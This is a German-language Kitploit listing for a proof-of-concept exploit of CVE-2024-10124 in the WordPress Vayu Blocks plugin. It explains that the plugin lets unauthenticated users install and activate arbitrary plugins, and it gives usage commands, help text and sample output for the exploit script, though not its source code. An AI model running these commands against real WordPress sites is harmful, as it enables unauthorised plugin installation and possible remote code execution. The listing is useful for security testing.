Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-10124-Poc — Proof-of-Concept-Exploit für CVE-2024-10124 im WordPress-Vayu-Blocks-Plugin, der eine unbefugte Installation und Aktivierung von Plugins ermöglicht, um möglicherweise eine Remote-Codeausführung zu erreichen. | Kitploit
Tools/GitHubGitHub/nxploited/cve-2024-10124-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2024-10124-poc

CVE-2024-10124-Poc

Proof-of-Concept-Exploit für CVE-2024-10124 im WordPress-Vayu-Blocks-Plugin, der eine unbefugte Installation und Aktivierung von Plugins ermöglicht, um möglicherweise eine Remote-Codeausführung zu erreichen.

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-10124-Poc

Das Plugin Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce für WordPress ist anfällig für die nicht autorisierte Installation und Aktivierung beliebiger Plugins aufgrund einer fehlenden Berechtigungsprüfung in der Funktion tp_install() in allen Versionen bis einschließlich 1.1.1. Dies ermöglicht es nicht authentifizierten Angreifern, beliebige Plugins zu installieren und zu aktivieren, was ausgenutzt werden kann, um eine Remotecodeausführung zu erreichen, wenn ein weiteres verwundbares Plugin installiert und aktiviert ist. Diese Schwachstelle wurde in Version 1.1.1 teilweise behoben.

Beispiel-Szenarien

Schwachstelle prüfen

root@kitploit:~
python CVE-2024-10124.py -u http://192.168.100.74/wordpress --check-version

Dies prüft die Version des Plugins vayu-blocks, um festzustellen, ob die Website verwundbar ist.

Ein Plugin installieren (Standard)

root@kitploit:~
python CVE-2024-10124.py -u http://192.168.100.74/wordpress

Dadurch wird das Standard-Plugin hello-dolly installiert.

Ein bestimmtes Plugin installieren

root@kitploit:~
python CVE-2024-10124.py -u http://192.168.100.74/wordpress -p plugin_name

Dadurch wird das Plugin plugin_name auf der Zielwebsite installiert.

root@kitploit:~
options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target URL (e.g., http://192.168.100.74/wordpress)
  -p PLUGIN, --plugin PLUGIN
                        Plugin name (default: hello-dolly)
  --check-version       Check if the site is vulnerable based on plugin version

Ausgabe

root@kitploit:~
Response Status Code: 200
The plugin has been successfully uploaded and activated.
Response Content: "http:\/\/192.168.100.74\/wordpress"

Hinweis:

Dieses Skript dient ausschließlich zu Bildungszwecken. Der Autor übernimmt keine Verantwortung für Schäden, die durch die missbräuchliche Verwendung dieses Skripts entstehen.

Tool herunterladen
🔍BefehlBeschreibungBeispiel
🌐-u or --urlGibt die Ziel-URL für die WordPress-Website an.-u http://192.168.100.74/wordpress
🔒--check-versionPrüft, ob die Website basierend auf der Version verwundbar ist.-u http://192.168.100.74/wordpress --check-version
⚙️-p or --pluginGibt den Plugin-Namen an (Standard ist hello-dolly).-u http://192.168.100.74/wordpress -p plugin_name